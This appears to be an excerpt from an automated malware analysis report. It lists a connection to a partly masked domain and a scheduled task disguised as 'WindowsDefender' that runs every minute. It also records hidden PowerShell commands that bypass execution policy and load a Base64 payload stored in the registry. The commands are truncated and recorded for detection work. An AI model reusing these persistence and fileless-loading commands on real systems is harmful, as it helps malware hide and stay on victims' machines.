Technical Information
- <SYSTEM32>\tasks\windowsdefender
- 'pa###bin.fun':443
- DNS ASK pa###bin.fun
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn WindowsDefender /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBas...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Dropless\).Payload...' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn WindowsDefender /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBas...
- '<SYSTEM32>\taskeng.exe' {9857EA06-9E3F-4B49-B70B-0EE599146B36} S-1-5-21-1960123792-2022915161-3775307078-1001:biruhkcnqkxi\user:Interactive:[1]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Dropless\).Payload...